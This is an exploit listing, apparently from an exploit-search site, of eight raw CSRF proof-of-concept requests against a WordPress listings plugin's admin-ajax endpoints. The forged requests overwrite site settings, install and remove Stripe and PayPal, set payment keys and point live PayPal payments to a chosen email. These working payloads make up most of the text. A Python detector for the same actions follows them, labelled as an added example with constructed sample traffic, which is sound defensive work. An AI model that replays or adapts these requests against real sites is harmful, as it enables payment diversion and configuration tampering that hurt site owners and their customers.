## https://sploitus.com/exploit?id=WPEX-ID:91448867-FB75-4D76-815D-86AAD5A64225
PoC #1 | CSRF | Main Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6784

action=stm_settings_save&data%5Bcron%5D%5Bmode%5D=alternate&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Btitle%5D=Google&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_id%5D%5Btitle%5D=Google+Client+ID&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_secret%5D%5Btitle%5D=Google+Client+Secret&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5BclassList%5D%5Bwrap%5D=google-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5BclassList%5D%5Bicon%5D=icon-search+path1&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com%2Fwp-login.php%3Fsocial_method%3Dgoogle&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for+-+%3Ca+target%3D%22_blank%22+href%3D%22https%3A%2F%2Fdevelopers.google.com%2Fidentity%2Fsign-in%2Fweb%2Fsign-in%22%3EGoogle+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like+-&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Btitle%5D=Facebook&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_id%5D%5Btitle%5D=Facebook+App+ID&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_secret%5D%5Btitle%5D=Facebook+App+Secret&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5BclassList%5D%5Bwrap%5D=facebook-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5BclassList%
5D%5Bicon%5D=fab+fa-facebook-f&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com%2F%3Fsocial_method%3DFacebook&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for+-+%3Ca+href%3D%22https%3A%2F%2Fdevelopers.facebook.com%2Fdocs%2Ffacebook-login%2F%22%3EFacebook+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like+-&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Btitle%5D=Twitter&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_id%5D%5Btitle%5D=Twitter+API+Key&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_secret%5D%5Btitle%5D=Twitter+API+Secret&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5BclassList%5D%5Bwrap%5D=twitter-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5BclassList%5D%5Bicon%5D=fab+fa-twitter&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for+-+%3Ca+href%3D%22https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Flog-in-with-twitter%2Flogin-in-with-twitter%22%3ETwitter+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like+-&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Btitle%5D=Vkontakte&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_id%5D%5Btitle%5D=Vk
ontakte+API+ID&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_secret%5D%5Btitle%5D=Vkontakte+Secret+Key&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5BclassList%5D%5Bwrap%5D=facebook-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5BclassList%5D%5Bicon%5D=fab+fa-vk&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for+-+%3Ca+href%3D%22https%3A%2F%2Fvk.com%2Fdev%22%3EVkontakte+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like+-&data%5BsocialLogin%5D%5Bpreferences%5D%5Btab%5D=yes&data%5BsocialLogin%5D%5Bpreferences%5D%5Bicons%5D=square&data%5BsocialLogin%5D%5Bpreferences%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data%5BsocialLogin%5D%5Bpreferences%5D%5Btitle%5D=Login+with+social+ID&data%5Bpages%5D%5Baccount_page%5D%5Baccount%5D=9&data%5Bpages%5D%5Baccount_endpoint%5D%5Bedit-profile%5D=edit-profile&data%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-plans%5D=my-plans&data%5Bpages%5D%5Baccount_endpoint%5D%5Bpayment-history%5D=payment-history&data%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-listing%5D=my-listing&data%5Bpages%5D%5Baccount_endpoint%5D%5Bsaved-searches%5D=saved-searches&data%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-card%5D=my-card&data%5Bpages%5D%5Baccount_endpoint%5D%5Bedit-account%5D=&data%5Bpages%5D%5Badd_listing%5D%5Blisting%5D=12&data%5Bpages%5D%5Bpricing_plan%5D%5Bpricing%5D=13&data%5Bpages%5D%5Blisting_type_page%5D%5B15%5D=16&data%5Bpages%5D%5Blisting_type_page%5D%5B17%5D=18&data%5Bpages%5D%5Blisting_type_page%5D%5B55%5D=2&data%5Bpages%5D%5Blisting_type_page%5D%5B62%5D=0&data%5Bpages%5D%5Bwishlist%5D%5Bwishlist_page%5D=&data%5Bpages%5D%5Bcom
pare%5D%5Bcompare_page%5D=&data%5Bmain%5D%5Bcurrency%5D%5Bcurrency%5D=USD&data%5Bmain%5D%5Bcurrency%5D%5Bposition%5D=left_space&data%5Bmain%5D%5Bcurrency%5D%5Bcharacters_after%5D=2&data%5Bmain%5D%5Bcurrency%5D%5Bdecimal_separator%5D=.&data%5Bmain%5D%5Bcurrency%5D%5Bthousands_separator%5D=%2C&data%5Bmain%5D%5Bmap%5D%5Bapi_key%5D=&data%5Bmain%5D%5Bmap%5D%5Bmap_type%5D=google&data%5Bmain%5D%5Bmap%5D%5Bhover_option%5D=no&data%5Bmain%5D%5Bpricing_plans%5D%5Bback_slots%5D=true&data%5Bmain%5D%5Bpricing_plans%5D%5Bdelete_listings%5D=true&data%5Bmain%5D%5Bshort_codes%5D%5Bcategories%5D=8&data%5Bmain%5D%5Bshort_codes%5D%5Bfeatured_listings%5D=8&data%5Bmain%5D%5Bextra%5D%5Bremove_db%5D=true&data%5Bmain%5D%5Bdefault_placeholder%5D=


PoC #2 | CSRF | Stripe Payment Install:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60

action=stm_payment_method&type=install&payment_method=stripe


PoC #3 | CSRF | Stripe Payment Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 260

action=stm_save_payment&id=stripe&data%5Bpublishable_key%5D=PoC&data%5Bsecret_key%5D=1553&data%5Bwhsec%5D=1553


PoC #4 | CSRF | PayPal Payment Install:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69

action=stm_payment_method&type=install&payment_method=paypal_standard


PoC #5 | CSRF | PayPal Payment Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94

action=stm_save_payment&id=paypal_standard&data%5Bemail%5D=poc%40email.tld&data%5Bmode%5D=live


PoC #6 | CSRF | PayPal Payment Uninstall:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 71

action=stm_payment_method&type=uninstall&payment_method=paypal_standard


PoC #7 | CSRF | Stripe Payment Uninstall:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 62

action=stm_payment_method&type=uninstall&payment_method=stripe


PoC #8 | CSRF | Email Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 439

action=stm_update_email_data&data%5Bbanner%5D=&data%5Blogo%5D=&data%5Bsocials%5D%5Binstagram%5D%5Blabel%5D=Instagram&data%5Bsocials%5D%5Binstagram%5D%5Blink%5D=&data%5Bsocials%5D%5Bfacebook%5D%5Blabel%5D=Facebook&data%5Bsocials%5D%5Bfacebook%5D%5Blink%5D=&data%5Bsocials%5D%5Byoutube%5D%5Blabel%5D=Youtube&data%5Bsocials%5D%5Byoutube%5D%5Blink%5D=&data%5Bsocials%5D%5Btwitter%5D%5Blabel%5D=Twitter&data%5Bsocials%5D%5Btwitter%5D%5Blink%5D=
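A detection pass over admin-ajax.php traffic for the four state-changing actions exercised by the PoCs above (stm_settings_save, stm_payment_method, stm_save_payment, stm_update_email_data), added here as an example and not part of the original listing or the plugin's code: it flags requests to these actions whose Origin/Referer host differs from the site's own host, and separately notes when no nonce field accompanies them. The nonce field names and the sample requests are assumptions constructed for the example.

```python
from urllib.parse import parse_qs, urlparse

# AJAX actions exercised by the PoCs above; each one writes persistent settings.
STATE_CHANGING_ACTIONS = {
    "stm_settings_save", "stm_payment_method",
    "stm_save_payment", "stm_update_email_data",
}
# Field names WordPress handlers commonly use to carry a nonce (an assumption;
# the PoC requests carry none, which is exactly what makes them forgeable).
NONCE_FIELDS = ("_wpnonce", "_ajax_nonce", "security", "nonce")
TRIAGE_FIELDS = ("type", "payment_method", "id")  # surfaced in each finding

def analyse_request(host, headers, body):
    """Inspect one POST to admin-ajax.php; return a finding dict or None."""
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    if action not in STATE_CHANGING_ACTIONS:
        return None
    reasons, severity = [], "low"
    # A request forged from another site arrives with that site's Origin (or
    # Referer); the plugin's own admin pages send the blog's host. Absent both,
    # the request did not come from the admin UI either, so treat it the same.
    source = headers.get("Origin") or headers.get("Referer") or ""
    if urlparse(source).hostname != host.split(":")[0].lower():
        reasons.append("cross-site or absent Origin/Referer: %r" % source)
        severity = "high"
    # Missing nonce is not proof of forgery (the unpatched plugin never sends
    # one), but it confirms the handler is reachable without CSRF protection.
    if not any(field in params for field in NONCE_FIELDS):
        reasons.append("no nonce field")
    if not reasons:
        return None
    detail = {"action": action}
    detail.update((k, params[k][0]) for k in TRIAGE_FIELDS if k in params)
    return {"severity": severity, "reasons": reasons, "detail": detail}

def scan(requests):
    """Apply analyse_request to (host, headers, body) tuples; keep findings."""
    return [f for f in (analyse_request(*r) for r in requests) if f]

# Constructed sample traffic modelled on the PoC bodies above (not real logs).
SAMPLE_REQUESTS = [
    ("example.com", {"Origin": "https://example.com"},
     "action=stm_payment_method&type=install&payment_method=stripe"),
    ("example.com", {"Origin": "https://other-site.example"},
     "action=stm_save_payment&id=paypal_standard&data%5Bemail%5D=poc%40email.tld"),
    ("example.com", {"Referer": "https://example.com/wp-admin/admin.php"},
     "action=stm_settings_save&security=abc123&data%5Bcron%5D%5Bmode%5D=alternate"),
    ("example.com", {"Origin": "https://example.com"}, "action=heartbeat"),
]
```

Running `scan(SAMPLE_REQUESTS)` yields two findings: a low-severity note for the same-site Stripe install that carries no nonce, and a high-severity hit for the PayPal settings update whose Origin is another site; the nonce-bearing settings save and the heartbeat are not reported.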